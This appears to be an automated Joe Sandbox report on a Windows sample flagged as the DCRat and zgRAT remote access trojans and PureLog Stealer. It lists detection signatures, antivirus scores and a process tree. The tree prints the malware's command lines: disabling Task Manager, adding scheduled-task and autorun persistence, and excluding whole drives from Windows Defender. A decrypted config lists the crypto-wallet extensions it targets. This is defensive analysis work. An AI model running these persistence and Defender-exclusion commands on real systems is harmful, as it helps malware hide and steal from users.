Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KzLetzDiM8.exe

Overview

General Information

Sample name:KzLetzDiM8.exe
renamed because original name is a hash value
Original sample name:A554052564261D9D5C7E0CD92514D3A0.exe
Analysis ID:1582599
MD5:a554052564261d9d5c7e0cd92514d3a0
SHA1:36187b2e29881e34a3fa51dd32b89c6bddcc68c6
SHA256:06effa75c48b51ef222da511c8550ff450947fd326389fa7d60613c79760d407
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • KzLetzDiM8.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\KzLetzDiM8.exe" MD5: A554052564261D9D5C7E0CD92514D3A0)
    • wscript.exe (PID: 6936 cmdline: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6864 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • ComComponentDriverInto.exe (PID: 6892 cmdline: "C:\fontdriversavescrt/ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
          • csc.exe (PID: 3104 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2840 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5592 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 5004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3796 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3288 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5772 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1596 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5956 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2756 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 3248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 5936 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1144 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7292 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7320 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8736 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 9060 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • ComComponentDriverInto.exe (PID: 8576 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • ComComponentDriverInto.exe (PID: 5904 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • ComComponentDriverInto.exe (PID: 6472 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • sihost.exe (PID: 8476 cmdline: "C:\Users\Default User\Documents\sihost.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • sihost.exe (PID: 8500 cmdline: "C:\Users\Default User\Documents\sihost.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Default\Documents\sihost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Users\Default\Documents\sihost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\fontdriversavescrt\ComComponentDriverInto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\fontdriversavescrt\ComComponentDriverInto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Process Memory Space: ComComponentDriverInto.exe PID: 6892JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    8.0.ComComponentDriverInto.exe.490000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      8.0.ComComponentDriverInto.exe.490000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Execution from Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Documents\sihost.exe", CommandLine: "C:\Users\Default User\Documents\sihost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\sihost.exe, NewProcessName: C:\Users\Default\Documents\sihost.exe, OriginalFileName: C:\Users\Default\Documents\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\sihost.exe", ProcessId: 8476, ProcessName: sihost.exe
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetFilename: C:\Users\Default User\Documents\sihost.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe
                        Sigma detected: System File Execution Location Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Default User\Documents\sihost.exe", CommandLine: "C:\Users\Default User\Documents\sihost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\sihost.exe, NewProcessName: C:\Users\Default\Documents\sihost.exe, OriginalFileName: C:\Users\Default\Documents\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\sihost.exe", ProcessId: 8476, ProcessName: sihost.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\fontdriversavescrt\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE
                        Sigma detected: CurrentVersion NT Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\fontdriversavescrt\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", ProcessId: 3104, ProcessName: csc.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\KzLetzDiM8.exe", ParentImage: C:\Users\user\Desktop\KzLetzDiM8.exe, ParentProcessId: 6688, ParentProcessName: KzLetzDiM8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , ProcessId: 6936, ProcessName: wscript.exe
                        Sigma detected: Dynamic CSharp Compile Artefact
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Dot net compiler compiles file from suspicious location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", ProcessId: 3104, ProcessName: csc.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T02:23:09.273748+010020480951A Network Trojan was detected192.168.2.44980437.44.238.25080TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Users\Default\Documents\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeReversingLabs: Detection: 78%
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeReversingLabs: Detection: 78%
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\Users\Default\Documents\sihost.exeReversingLabs: Detection: 78%
                        Source: C:\Users\Default\Documents\sihost.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\Users\user\Desktop\AdxdALuR.logReversingLabs: Detection: 29%
                        Source: C:\Users\user\Desktop\AdxdALuR.logVirustotal: Detection: 30%Perma Link
                        Source: C:\Users\user\Desktop\IGGSkEKz.logReversingLabs: Detection: 50%
                        Source: C:\Users\user\Desktop\IGGSkEKz.logVirustotal: Detection: 40%Perma Link
                        Source: C:\Users\user\Desktop\gLKxhGkC.logVirustotal: Detection: 10%Perma Link
                        Source: C:\Users\user\Desktop\izOFSTgA.logReversingLabs: Detection: 25%
                        Source: C:\Users\user\Desktop\izOFSTgA.logVirustotal: Detection: 34%Perma Link
                        Source: C:\Users\user\Desktop\jwqNoTvv.logReversingLabs: Detection: 70%
                        Source: C:\Users\user\Desktop\jwqNoTvv.logVirustotal: Detection: 69%Perma Link
                        Source: C:\Users\user\Desktop\ppTmQzAj.logReversingLabs: Detection: 37%
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeReversingLabs: Detection: 78%
                        Source: C:\fontdriversavescrt\WmiPrvSE.exeReversingLabs: Detection: 78%
                        Multi AV Scanner detection for submitted file
                        Source: KzLetzDiM8.exeVirustotal: Detection: 51%Perma Link
                        Source: KzLetzDiM8.exeReversingLabs: Detection: 65%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                        Machine Learning detection for dropped file
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeJoe Sandbox ML: detected
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJoe Sandbox ML: detected
                        Source: C:\Users\Default\Documents\sihost.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: KzLetzDiM8.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
